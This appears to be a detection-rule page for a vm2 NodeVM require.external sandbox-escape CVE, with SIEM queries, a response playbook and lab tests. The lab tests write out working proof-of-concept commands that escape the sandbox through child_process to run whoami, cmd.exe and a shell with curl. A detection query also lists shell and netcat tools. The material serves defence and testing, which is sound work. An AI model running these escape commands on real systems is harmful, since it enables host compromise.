vm2 NodeVM require.external Sandbox Escape to RCE (CVE-2026-92946)
Detects exploitation and presence of CVE-2026-92946, a critical (CVSS 10.0) sandbox-escape vulnerability in the vm2 JavaScript sandbox library (npm package 'vm2') at versions <= 3.11.6. When a NodeVM is configured with `require.external` enabled but without an explicit `require.root` allow-list, the sandbox fails to constrain module resolution (CWE-913: Improper Control of Dynamically-Managed Code Resources), permitting sandboxed scripts to require arbitrary host filesystem modules (e.g. 'child_process', 'fs') and achieve full remote code execution on the host. This detection surfaces vulnerable vm2 installs, suspicious child-process/filesystem activity spawned by Node.js processes hosting vm2, and PoC-style require patterns indicative of escape attempts.
Vulnerability Intelligence
Public PoCAffected Software
- Vendor
- npm
- Product
- vm2
- Versions
- <= 3.11.6
Weakness (CWE)
Timeline
- Disclosed
- October 5, 2026
References & Proof of Concept
- PoChttps://github.com/advisories/GHSA-j3hm-6rg5-mchv
- https://github.com/patriksimek/vm2/security/advisories/GHSA-j3hm-6rg5-mchv
- https://nvd.nist.gov/vuln/detail/CVE-2026-92946
- https://github.com/patriksimek/vm2/commit/903017c8a1eae9aba947ec854468b48155e79f86
- https://github.com/patriksimek/vm2/releases/tag/v3.11.7
- https://www.vulncheck.com/advisories/vm2-before-3.11.7-remote-code-execution-via-require-external
CVSS
What is CVE-2026-92946 vm2 NodeVM require.external Sandbox Escape to RCE (CVE-2026-92946)?
vm2 NodeVM require.external Sandbox Escape to RCE (CVE-2026-92946) (CVE-2026-92946) maps to the Execution and Initial Access tactics — the adversary is trying to run malicious code in MITRE ATT&CK.
This page provides production-ready detection logic for vm2 NodeVM require.external Sandbox Escape to RCE (CVE-2026-92946), covering the data sources and telemetry it touches: Microsoft Defender for Endpoint. The queries below are rated critical severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.
MITRE ATT&CK
- Tactic
- Execution Initial Access
// vm2 RCE via require.external — Node.js process spawning host-level child processes indicative of sandbox escape
let suspiciousChildren = dynamic(["cmd.exe","powershell.exe","bash","sh","/bin/sh","/bin/bash","whoami.exe","whoami","curl","wget","nc","ncat"]);
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("node.exe","node")
| where FileName in~ (suspiciousChildren) or ProcessCommandLine has_any ("child_process","require('child_process')","require(\"child_process\")")
| where InitiatingProcessCommandLine has_any ("vm2","NodeVM","require.external")
or ProcessCommandLine has_any ("vm2","require.external")
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, AccountName, InitiatingProcessFolderPath
| order by Timestamp desc Flags Node.js processes (potential vm2 hosts) spawning shells or reconnaissance binaries where the command line references vm2/require.external, consistent with a NodeVM require.external sandbox escape to RCE.
Data Sources
Required Tables
False Positives
- Legitimate Node.js build tooling or task runners that spawn shells as a normal part of their workflow
- Developer workstations running vm2 in a properly configured (require.root scoped) sandbox during testing
- Automation/CI agents written in Node.js that invoke curl/wget for artifact downloads
Sigma rule & cross-platform mapping
The detection logic for vm2 NodeVM require.external Sandbox Escape to RCE (CVE-2026-92946) (CVE-2026-92946) above is provided in a vendor-neutral
form so you can deploy it on any SIEM. The same logic is shipped here as native
KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the
following logsource:
logsource:
category: process_creation
product: windows Browse the community-maintained Sigma rules for this technique:
Platform-specific guides for CVE-2026-92946
References (6)
- https://github.com/patriksimek/vm2/security/advisories/GHSA-j3hm-6rg5-mchv
- https://nvd.nist.gov/vuln/detail/CVE-2026-92946
- https://github.com/patriksimek/vm2/commit/903017c8a1eae9aba947ec854468b48155e79f86
- https://github.com/patriksimek/vm2/releases/tag/v3.11.7
- https://www.vulncheck.com/advisories/vm2-before-3.11.7-remote-code-execution-via-require-external
- https://github.com/advisories/GHSA-j3hm-6rg5-mchv
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Install vulnerable vm2 and trigger require.external escape (lab)
Expected signal: Sysmon/auditd process-creation event: node parent spawning a 'whoami' child process; npm install writing node_modules/vm2 at version 3.11.6.
- Test 2vm2 require.external spawns reverse-shell style command (lab)
Expected signal: node -> sh -> curl process chain and a network connection attempt from the node process tree.
- Test 3Windows vm2 require.external escape to cmd.exe (lab)
Expected signal: Sysmon EID 1: node.exe parent spawning cmd.exe -> whoami.exe; node_modules\vm2 at 3.11.6.
Response Playbook
Triage
- Confirm the affected host runs a Node.js application that depends on vm2 — inspect package.json / package-lock.json / node_modules/vm2/package.json for a version <= 3.11.6.
- Review the application source for NodeVM instantiation where `require.external` is enabled (true or an object) WITHOUT an explicit `require.root` allow-list — this is the vulnerable configuration.
- Examine the flagged child-process event: determine whether the spawned shell/recon command originated from untrusted script input passed into the sandbox.
- Correlate the timestamp with inbound requests or job inputs to identify the attacker-controlled payload that drove the require() call.
Containment
- Upgrade vm2 to 3.11.7 or later across all affected services, or remove vm2 entirely (the library is deprecated; migrate to isolated-vm or a separate-process sandbox).
- As an immediate mitigation, set an explicit `require.root` allow-list (or disable `require.external`) in every NodeVM configuration until the upgrade is deployed.
- Isolate the affected host from the network if host RCE is confirmed, and rotate any credentials/secrets accessible to the Node process.
Evidence Collection
- Capture the vulnerable application source, package-lock.json, and node_modules/vm2/package.json to preserve the exact vulnerable version.
- Collect process-creation telemetry (Sysmon EID 1 / auditd execve) for the node parent and all child processes around the event window.
- Preserve application and reverse-proxy access logs capturing the untrusted input submitted to the sandbox.
Escalation Criteria
- ! Escalate to incident response if a child process executed reconnaissance, established network connections, or wrote files outside the application directory — indicating confirmed host RCE.
- ! Escalate if the affected service is internet-facing or processes untrusted user-supplied scripts, given the CVSS 10.0 severity and public PoC availability.
Investigation Guide
Forensic Artifacts
- >
node_modules/vm2/package.json showing version <= 3.11.6 - >
Process-creation records of node spawning shell/recon children - >
Application logs containing the malicious require() payload submitted to the sandbox
Tuning Guidance
Build an allow-list of known-good Node applications that legitimately spawn shells (build tooling, CI runners) and exclude them by InitiatingProcessFolderPath or host. Focus alerting on internet-facing services and hosts where vm2 <= 3.11.6 is confirmed present. Tighten confidence to high when the parent command line explicitly references vm2/require.external and the child is a recon binary.
Hunting Queries
Baselines all Node.js processes that spawn shell children across the fleet so analysts can identify anomalous vm2-driven execution.
DeviceProcessEvents | where InitiatingProcessFileName in~ ("node.exe","node") | where FileName in~ ("cmd.exe","powershell.exe","bash","sh") | summarize count() by DeviceName, InitiatingProcessCommandLine, FileName, ProcessCommandLine index=* (parent_process_name=node OR parent_process_name=node.exe) (process_name=*sh OR process_name=*cmd.exe OR process_name=*powershell.exe) | stats count by host, parent_process, process Atomic Red Team Tests
Installs vm2 3.11.6 and runs a NodeVM with require.external enabled but no require.root, executing a sandboxed script that requires child_process to run 'whoami' on the host.
Command
mkdir -p /tmp/vm2poc && cd /tmp/vm2poc && npm init -y >/dev/null 2>&1 && npm install [email protected] >/dev/null 2>&1 && node -e "const {NodeVM}=require('vm2');const vm=new NodeVM({require:{external:true}});vm.run(\"require('child_process').execSync('whoami').toString()\",'poc.js')" Cleanup
rm -rf /tmp/vm2poc Expected Telemetry
Sysmon/auditd process-creation event: node parent spawning a 'whoami' child process; npm install writing node_modules/vm2 at version 3.11.6.
Expected Detection
KQL/SPL/EDR rules fire on node spawning whoami with vm2/require.external context.
Demonstrates full RCE by having the sandboxed script use child_process to invoke a host shell that runs an outbound curl, simulating attacker command execution.
Command
cd /tmp/vm2poc && node -e "const {NodeVM}=require('vm2');const vm=new NodeVM({require:{external:true}});vm.run(\"require('child_process').execSync('sh -c \\\"id; curl -s http://127.0.0.1:9999/ || true\\\"')\",'poc.js')" Cleanup
rm -rf /tmp/vm2poc Expected Telemetry
node -> sh -> curl process chain and a network connection attempt from the node process tree.
Expected Detection
Rules match node-parented sh/curl execution with vm2 indicators.
On Windows, installs vulnerable vm2 and uses require.external to spawn cmd.exe via child_process, demonstrating host RCE on Windows Node deployments.
Command
powershell -Command "mkdir C:\temp\vm2poc -Force; cd C:\temp\vm2poc; npm init -y; npm install [email protected]; node -e \"const {NodeVM}=require('vm2');const vm=new NodeVM({require:{external:true}});vm.run(`require('child_process').execSync('cmd.exe /c whoami').toString()`,'poc.js')\"" Cleanup
powershell -Command "Remove-Item -Recurse -Force C:\temp\vm2poc" Expected Telemetry
Sysmon EID 1: node.exe parent spawning cmd.exe -> whoami.exe; node_modules\vm2 at 3.11.6.
Expected Detection
KQL DeviceProcessEvents / CrowdStrike CQL rules fire on node.exe spawning cmd.exe with vm2/require.external context.